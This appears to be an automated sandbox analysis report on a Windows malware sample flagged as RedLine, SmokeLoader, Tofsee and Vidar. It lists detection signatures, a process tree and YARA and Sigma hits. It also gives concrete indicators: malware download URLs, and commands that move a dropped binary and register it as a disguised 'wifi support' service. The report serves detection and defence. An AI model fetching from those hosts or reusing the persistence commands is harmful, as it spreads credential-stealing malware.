Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ZA3cYU28Yl.exe

Overview

General Information

Sample Name:ZA3cYU28Yl.exe
Analysis ID:553399
MD5:679831cf1f00950b4adffbbba7e6ab46
SHA1:f4aa59829222d5ed000849ea0167082f54b59e03
SHA256:760d44ea1a90c1b235133258a8f03bed049b5b51328aefe4a2595b6f085dd99d
Tags:exeTeamBot
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ZA3cYU28Yl.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe" MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
    • ZA3cYU28Yl.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe" MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 9460.exe (PID: 6608 cmdline: C:\Users\user\AppData\Local\Temp\9460.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • A019.exe (PID: 3340 cmdline: C:\Users\user\AppData\Local\Temp\A019.exe MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
          • A019.exe (PID: 5000 cmdline: C:\Users\user\AppData\Local\Temp\A019.exe MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
        • 9779.exe (PID: 2228 cmdline: C:\Users\user\AppData\Local\Temp\9779.exe MD5: 043B44289E31BD54357F9A5C21833259)
        • A881.exe (PID: 7004 cmdline: C:\Users\user\AppData\Local\Temp\A881.exe MD5: 9AF71C74219794F100EA801B528339AF)
          • cmd.exe (PID: 6520 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 956 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • B217.exe (PID: 4400 cmdline: C:\Users\user\AppData\Local\Temp\B217.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B217.exe (PID: 6824 cmdline: C:\Users\user\AppData\Local\Temp\B217.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 5672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5024 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6376 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3676 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3608 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • rcvfbte (PID: 1308 cmdline: C:\Users\user\AppData\Roaming\rcvfbte MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
    • rcvfbte (PID: 5888 cmdline: C:\Users\user\AppData\Roaming\rcvfbte MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
  • svchost.exe (PID: 1324 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\969F.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            20.1.A019.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              26.3.A881.exe.7f0000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                26.2.A881.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  26.2.A881.exe.6c0e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    15.1.rcvfbte.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A881.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A881.exe, ParentProcessId: 7004, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, ProcessId: 956
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A881.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A881.exe, ParentProcessId: 7004, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5872

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://81.163.30.181/l2.exeAvira URL Cloud: Label: malware
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/l3.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\72B9.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Source: C:\Users\user\AppData\Local\Temp\2EE4.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeVirustotal: Detection: 17%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\293.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\293.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\48E7.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\48E7.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\50E7.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\969F.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeReversingLabs: Detection: 46%
                      Machine Learning detection for sampleShow sources
                      Source: ZA3cYU28Yl.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\7F9A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\8ECE.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\rcvfbteJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\293.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\41A3.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3657.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\48E7.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\969F.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\lnagngtg.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\50E7.exeJoe Sandbox ML: detected
                      Source: 26.3.A881.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.A881.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 22.3.9779.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.A881.exe.6c0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.2.9779.exe.7d0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeUnpacked PE file: 22.2.9779.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeUnpacked PE file: 26.2.A881.exe.400000.0.unpack
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49941 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49942 version: TLS 1.0
                      Source: ZA3cYU28Yl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49919 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49927 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49938 version: TLS 1.2
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000015.00000003.395354648.0000000004A9A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb) source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: $C:\sujabofu\kusaximenoki-xade\belowupo.pdbh source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdb; source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: dC:\mezakidujawu dukopigowoyiy56\feno_coje.pdbh source: ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbq source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sujabofu\kusaximenoki-xade\belowupo.pdb source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: C:\mezakidujawu dukopigowoyiy56\feno_coje.pdb source: ZA3cYU28Yl.exe, ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbk source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdb= source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_004196BC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
